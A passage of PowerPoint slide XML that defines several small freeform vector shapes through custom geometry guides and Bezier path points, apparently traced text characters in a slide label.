            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5526088" y="1108075"/>
                <a:ext cx="33338" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 19 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 4 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 10 w 16"/>
                  <a:gd name="T7" fmla="*/ 1 h 19"/>
                  <a:gd name="T8" fmla="*/ 15 w 16"/>
                  <a:gd name="T9" fmla="*/ 4 h 19"/>
                  <a:gd name="T10" fmla="*/ 16 w 16"/>
                  <a:gd name="T11" fmla="*/ 10 h 19"/>
                  <a:gd name="T12" fmla="*/ 15 w 16"/>
                  <a:gd name="T13" fmla="*/ 15 h 19"/>
                  <a:gd name="T14" fmla="*/ 12 w 16"/>
                  <a:gd name="T15" fmla="*/ 18 h 19"/>
                  <a:gd name="T16" fmla="*/ 6 w 16"/>
                  <a:gd name="T17" fmla="*/ 19 h 19"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 2 w 16"/>
                  <a:gd name="T21" fmla="*/ 18 h 19"/>
                  <a:gd name="T22" fmla="*/ 4 w 16"/>
                  <a:gd name="T23" fmla="*/ 18 h 19"/>
                  <a:gd name="T24" fmla="*/ 10 w 16"/>
                  <a:gd name="T25" fmla="*/ 17 h 19"/>
                  <a:gd name="T26" fmla="*/ 13 w 16"/>
                  <a:gd name="T27" fmla="*/ 14 h 19"/>
                  <a:gd name="T28" fmla="*/ 14 w 16"/>
                  <a:gd name="T29" fmla="*/ 10 h 19"/>
                  <a:gd name="T30" fmla="*/ 13 w 16"/>
                  <a:gd name="T31" fmla="*/ 5 h 19"/>
                  <a:gd name="T32" fmla="*/ 9 w 16"/>
                  <a:gd name="T33" fmla="*/ 2 h 19"/>
                  <a:gd name="T34" fmla="*/ 3 w 16"/>
                  <a:gd name="T35" fmla="*/ 2 h 19"/>
                  <a:gd name="T36" fmla="*/ 2 w 16"/>
                  <a:gd name="T37" fmla="*/ 2 h 19"/>
                  <a:gd name="T38" fmla="*/ 2 w 16"/>
                  <a:gd name="T3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19">
                    <a:moveTo>
                      <a:pt x="0" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="1"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="15" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="6"/>
                      <a:pt x="16" y="8"/>
                      <a:pt x="16" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="12"/>
                      <a:pt x="16" y="14"/>
                      <a:pt x="15" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="17"/>
                      <a:pt x="13" y="18"/>
                      <a:pt x="12" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="9" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="10" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="12" y="16"/>
                      <a:pt x="13" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="13"/>
                      <a:pt x="14" y="12"/>
                      <a:pt x="14" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="8"/>
                      <a:pt x="14" y="6"/>
                      <a:pt x="13" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="4"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="9" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBez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0"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5567363" y="1117600"/>
                <a:ext cx="7938" cy="30163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 15"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 15"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 15"/>
                  <a:gd name="T6" fmla="*/ 3 w 4"/>
                  <a:gd name="T7" fmla="*/ 2 h 15"/>
                  <a:gd name="T8" fmla="*/ 2 w 4"/>
                  <a:gd name="T9" fmla="*/ 3 h 15"/>
                  <a:gd name="T10" fmla="*/ 1 w 4"/>
                  <a:gd name="T11" fmla="*/ 2 h 15"/>
                  <a:gd name="T12" fmla="*/ 0 w 4"/>
                  <a:gd name="T13" fmla="*/ 1 h 15"/>
                  <a:gd name="T14" fmla="*/ 1 w 4"/>
                  <a:gd name="T15" fmla="*/ 0 h 15"/>
                  <a:gd name="T16" fmla="*/ 2 w 4"/>
                  <a:gd name="T17" fmla="*/ 0 h 15"/>
                  <a:gd name="T18" fmla="*/ 2 w 4"/>
                  <a:gd name="T19" fmla="*/ 11 h 15"/>
                  <a:gd name="T20" fmla="*/ 3 w 4"/>
                  <a:gd name="T21" fmla="*/ 12 h 15"/>
                  <a:gd name="T22" fmla="*/ 4 w 4"/>
                  <a:gd name="T23" fmla="*/ 13 h 15"/>
                  <a:gd name="T24" fmla="*/ 3 w 4"/>
                  <a:gd name="T25" fmla="*/ 14 h 15"/>
                  <a:gd name="T26" fmla="*/ 2 w 4"/>
                  <a:gd name="T27" fmla="*/ 15 h 15"/>
                  <a:gd name="T28" fmla="*/ 1 w 4"/>
                  <a:gd name="T29" fmla="*/ 14 h 15"/>
                  <a:gd name="T30" fmla="*/ 0 w 4"/>
                  <a:gd name="T31" fmla="*/ 13 h 15"/>
                  <a:gd name="T32" fmla="*/ 1 w 4"/>
                  <a:gd name="T33" fmla="*/ 12 h 15"/>
                  <a:gd name="T34" fmla="*/ 2 w 4"/>
                  <a:gd name="T35"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15">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="1"/>
                      <a:pt x="4" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="2"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="3"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="11"/>
                      <a:pt x="3" y="12"/>
                      <a:pt x="3" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="12"/>
                      <a:pt x="4" y="13"/>
                      <a:pt x="4" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="14"/>
                      <a:pt x="4" y="14"/>
                      <a:pt x="3" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="14"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="1" y="12"/>
                      <a:pt x="1" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="2" y="11"/>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61"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5595938" y="1108075"/>
                <a:ext cx="20638" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 0 h 20"/>
                  <a:gd name="T2" fmla="*/ 10 w 10"/>
                  <a:gd name="T3" fmla="*/ 0 h 20"/>
                  <a:gd name="T4" fmla="*/ 10 w 10"/>
                  <a:gd name="T5" fmla="*/ 13 h 20"/>
                  <a:gd name="T6" fmla="*/ 9 w 10"/>
                  <a:gd name="T7" fmla="*/ 17 h 20"/>
                  <a:gd name="T8" fmla="*/ 8 w 10"/>
                  <a:gd name="T9" fmla="*/ 19 h 20"/>
                  <a:gd name="T10" fmla="*/ 5 w 10"/>
                  <a:gd name="T11" fmla="*/ 20 h 20"/>
                  <a:gd name="T12" fmla="*/ 3 w 10"/>
                  <a:gd name="T13" fmla="*/ 19 h 20"/>
                  <a:gd name="T14" fmla="*/ 0 w 10"/>
                  <a:gd name="T15" fmla="*/ 18 h 20"/>
                  <a:gd name="T16" fmla="*/ 1 w 10"/>
                  <a:gd name="T17" fmla="*/ 16 h 20"/>
                  <a:gd name="T18" fmla="*/ 4 w 10"/>
                  <a:gd name="T19" fmla="*/ 18 h 20"/>
                  <a:gd name="T20" fmla="*/ 5 w 10"/>
                  <a:gd name="T21" fmla="*/ 18 h 20"/>
                  <a:gd name="T22" fmla="*/ 7 w 10"/>
                  <a:gd name="T23" fmla="*/ 18 h 20"/>
                  <a:gd name="T24" fmla="*/ 8 w 10"/>
                  <a:gd name="T25" fmla="*/ 16 h 20"/>
                  <a:gd name="T26" fmla="*/ 8 w 10"/>
                  <a:gd name="T27" fmla="*/ 13 h 20"/>
                  <a:gd name="T28" fmla="*/ 8 w 10"/>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20">
                    <a:moveTo>
                      <a:pt x="8" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="0"/>
                      <a:pt x="10" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="13"/>
                      <a:pt x="10" y="13"/>
                      <a:pt x="10" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="15"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="18"/>
                      <a:pt x="8" y="19"/>
                      <a:pt x="8" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="20"/>
                      <a:pt x="6" y="20"/>
                      <a:pt x="5" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="20"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="19"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="16"/>
                      <a:pt x="1" y="16"/>
                      <a:pt x="1" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="17"/>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="5" y="18"/>
                      <a:pt x="5" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="6" y="18"/>
                      <a:pt x="7" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="17"/>
                      <a:pt x="7" y="17"/>
                      <a:pt x="8" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="16"/>
                      <a:pt x="8" y="15"/>
                      <a:pt x="8" y="13"/>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62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5626100" y="1108075"/>
                <a:ext cx="26988" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 13"/>
                  <a:gd name="T1" fmla="*/ 0 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 13"/>
                  <a:gd name="T3" fmla="*/ 0 h 20"/>
                  <a:gd name="T4" fmla="*/ 2 w 13"/>
                  <a:gd name="T5" fmla="*/ 12 h 20"/>
                  <a:gd name="T6" fmla="*/ 2 w 13"/>
                  <a:gd name="T7" fmla="*/ 14 h 20"/>
                  <a:gd name="T8" fmla="*/ 2 w 13"/>
                  <a:gd name="T9" fmla="*/ 16 h 20"/>
                  <a:gd name="T10" fmla="*/ 4 w 13"/>
                  <a:gd name="T11" fmla="*/ 18 h 20"/>
                  <a:gd name="T12" fmla="*/ 6 w 13"/>
                  <a:gd name="T13" fmla="*/ 18 h 20"/>
                  <a:gd name="T14" fmla="*/ 8 w 13"/>
                  <a:gd name="T15" fmla="*/ 18 h 20"/>
                  <a:gd name="T16" fmla="*/ 10 w 13"/>
                  <a:gd name="T17" fmla="*/ 16 h 20"/>
                  <a:gd name="T18" fmla="*/ 10 w 13"/>
                  <a:gd name="T19" fmla="*/ 15 h 20"/>
                  <a:gd name="T20" fmla="*/ 11 w 13"/>
                  <a:gd name="T21" fmla="*/ 12 h 20"/>
                  <a:gd name="T22" fmla="*/ 11 w 13"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 13 w 13"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 13 w 13"/>
                  <a:gd name="T27" fmla="*/ 12 h 20"/>
                  <a:gd name="T28" fmla="*/ 12 w 13"/>
                  <a:gd name="T29" fmla="*/ 16 h 20"/>
                  <a:gd name="T30" fmla="*/ 10 w 13"/>
                  <a:gd name="T31" fmla="*/ 19 h 20"/>
                  <a:gd name="T32" fmla="*/ 6 w 13"/>
                  <a:gd name="T33" fmla="*/ 20 h 20"/>
                  <a:gd name="T34" fmla="*/ 2 w 13"/>
                  <a:gd name="T35" fmla="*/ 19 h 20"/>
                  <a:gd name="T36" fmla="*/ 0 w 13"/>
                  <a:gd name="T37" fmla="*/ 16 h 20"/>
                  <a:gd name="T38" fmla="*/ 0 w 13"/>
                  <a:gd name="T39" fmla="*/ 12 h 20"/>
                  <a:gd name="T40" fmla="*/ 0 w 13"/>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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="12"/>
                      <a:pt x="2" y="12"/>
                      <a:pt x="2" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="13"/>
                      <a:pt x="2" y="14"/>
                      <a:pt x="2" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="16"/>
                      <a:pt x="2" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="18"/>
                      <a:pt x="5" y="18"/>
                      <a:pt x="6" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="8" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="10" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="16"/>
                      <a:pt x="10" y="15"/>
                      <a:pt x="10" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="13"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="13"/>
                      <a:pt x="12" y="15"/>
                      <a:pt x="12" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="8" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="3" y="20"/>
                      <a:pt x="2" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="18"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="0" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="15"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="1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3"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5661025" y="1108075"/>
                <a:ext cx="33338" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 24 h 24"/>
                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 2 w 21"/>
                  <a:gd name="T5" fmla="*/ 0 h 24"/>
                  <a:gd name="T6" fmla="*/ 18 w 21"/>
                  <a:gd name="T7" fmla="*/ 19 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 21 w 21"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 21"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 20 w 21"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 3 w 21"/>
                  <a:gd name="T17" fmla="*/ 6 h 24"/>
                  <a:gd name="T18" fmla="*/ 3 w 21"/>
                  <a:gd name="T19" fmla="*/ 24 h 24"/>
                  <a:gd name="T20" fmla="*/ 0 w 21"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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4"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5722938" y="1108075"/>
                <a:ext cx="9525" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 6"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 6 w 6"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 4 w 6"/>
                  <a:gd name="T7" fmla="*/ 24 h 24"/>
                  <a:gd name="T8" fmla="*/ 4 w 6"/>
                  <a:gd name="T9" fmla="*/ 2 h 24"/>
                  <a:gd name="T10" fmla="*/ 0 w 6"/>
                  <a:gd name="T11" fmla="*/ 2 h 24"/>
                  <a:gd name="T12" fmla="*/ 1 w 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 h="24">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5748338" y="1104900"/>
                <a:ext cx="25400" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 13"/>
                  <a:gd name="T1" fmla="*/ 7 h 20"/>
                  <a:gd name="T2" fmla="*/ 0 w 13"/>
                  <a:gd name="T3" fmla="*/ 7 h 20"/>
                  <a:gd name="T4" fmla="*/ 2 w 13"/>
                  <a:gd name="T5" fmla="*/ 2 h 20"/>
                  <a:gd name="T6" fmla="*/ 7 w 13"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 11 w 13"/>
                  <a:gd name="T9" fmla="*/ 2 h 20"/>
                  <a:gd name="T10" fmla="*/ 13 w 13"/>
                  <a:gd name="T11" fmla="*/ 6 h 20"/>
                  <a:gd name="T12" fmla="*/ 12 w 13"/>
                  <a:gd name="T13" fmla="*/ 9 h 20"/>
                  <a:gd name="T14" fmla="*/ 9 w 13"/>
                  <a:gd name="T15" fmla="*/ 13 h 20"/>
                  <a:gd name="T16" fmla="*/ 4 w 13"/>
                  <a:gd name="T17" fmla="*/ 19 h 20"/>
                  <a:gd name="T18" fmla="*/ 13 w 13"/>
                  <a:gd name="T19" fmla="*/ 19 h 20"/>
                  <a:gd name="T20" fmla="*/ 13 w 13"/>
                  <a:gd name="T21" fmla="*/ 20 h 20"/>
                  <a:gd name="T22" fmla="*/ 0 w 13"/>
                  <a:gd name="T23" fmla="*/ 20 h 20"/>
                  <a:gd name="T24" fmla="*/ 7 w 13"/>
                  <a:gd name="T25" fmla="*/ 12 h 20"/>
                  <a:gd name="T26" fmla="*/ 10 w 13"/>
                  <a:gd name="T27" fmla="*/ 9 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 13"/>
                  <a:gd name="T29" fmla="*/ 6 h 20"/>
                  <a:gd name="T30" fmla="*/ 10 w 13"/>
                  <a:gd name="T31" fmla="*/ 3 h 20"/>
                  <a:gd name="T32" fmla="*/ 7 w 13"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 3 w 13"/>
                  <a:gd name="T35" fmla="*/ 3 h 20"/>
                  <a:gd name="T36" fmla="*/ 2 w 13"/>
                  <a:gd name="T37"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20">
                    <a:moveTo>
                      <a:pt x="2" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="7" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="1"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="3"/>
                      <a:pt x="13" y="5"/>
                      <a:pt x="13" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="7"/>
                      <a:pt x="12" y="8"/>
                      <a:pt x="12" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="10"/>
                      <a:pt x="10" y="12"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="19"/>
                      <a:pt x="13" y="19"/>
                      <a:pt x="13" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="20"/>
                      <a:pt x="13" y="20"/>
                      <a:pt x="13" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="12"/>
                      <a:pt x="7" y="12"/>
                      <a:pt x="7" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="11"/>
                      <a:pt x="10" y="9"/>
                      <a:pt x="10" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="8"/>
                      <a:pt x="11" y="7"/>
                      <a:pt x="11" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="5"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="7" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
